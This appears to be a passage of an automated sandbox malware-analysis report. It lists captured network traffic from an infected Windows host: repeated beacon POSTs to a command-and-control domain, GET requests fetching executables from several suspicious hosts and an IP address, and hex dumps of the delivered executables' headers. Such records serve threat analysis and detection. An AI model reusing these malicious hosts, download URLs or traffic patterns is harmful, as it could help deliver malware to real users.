00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 20:05:47 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 17:15:09 GMTETag: "6ff1c7-5d58df1eec44d"Accept-Ranges: bytesContent-Length: 7336391Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 ae e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 12 0b 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 14 Jan 2022 18:57:27 GMTAccept-Ranges: bytesETag: "9bd1193789d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 14 Jan 2022 20:05:54 GMTContent-Length: 54272Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 76 4c 96 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 16 00 00 00 bc 00 00 00 00 00 00 12 35 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 34 00 00 4f 00 00 00 00 40 00 00 5c b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 a4 34 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 15 00 00 00 20 00 00 00 16 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c b9 00 00 00 40 00 00 00 ba 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 34 00 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 23 00 00 60 10 00 00 01 00 00 00 01 00 00 06 ec 33 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 3a 00 00 00 01 00 00 11 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 73 05 00 00 06 0a 06 6f 04 00 00 06 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 16 0c 2b 00 08 2a 22 02 28 16 00 00 0a 00 2a 00 1b 30 06 00 ae 00 00 00 02 00 00 11 00 d0 20 00 00 01 28 17 00 00 0a 72 01 00 00 70 17 8d 14 00 00 01 25 16 d0 22 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 14 17 8d 10 00 00 01 25 16 20 20 4e 00 00 8c 22 00 00 01 a2 6f 19 00 00 0a 26 00 20 00 0c 00 00 28 1a 00 00 0a 00 00 de 05 26 00 00 de 00 d0 26 00 00 01 28 17 00 00 0a 72 0d 00 00 70 72 35 00 00 70 72 39 00 00 70 28 1b 00 00 0a 17 8d 14 00 00 01 25 16 d0 27 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 73 1c 00 00 0a 17 8d 10 00 00 01 25 16 72 3b 00 00 70 a2 6f 19 00 00 0a 74 01 00 00 1b 0a 2b 00 06 2a 00 00 01 10 00 00 00 00 42 00 0f 51 00 05 10 00 00 01 1b 30 03 00 37 01 00 00 03 00 00 11 00 02 28 03 00 00 06 0a 06 14 fe 03 13 04 11 04 2c 0b 06 16 06 8e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:00 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:04 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 20:06:06 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 16:06:29 GMTETag: "6ff1c1-5d58cfc604e56"Accept-Ranges: bytesContent-Length: 7336385Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 25 0a 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49949 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49950 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmmufccsxa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejoocwvno.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymxxgm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxhncf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csftwsmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdbmpnrkfj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxeebf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxkku.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdcyfq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lujat.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttjdaam.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqfbvly.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwyvhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idmvulr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vooxhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvdrjru.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ubjcetayse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxcrq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywlgtk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foglcav.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnhyhp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nefwc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsakwxty.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcjkx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: host-data-coin-11.com
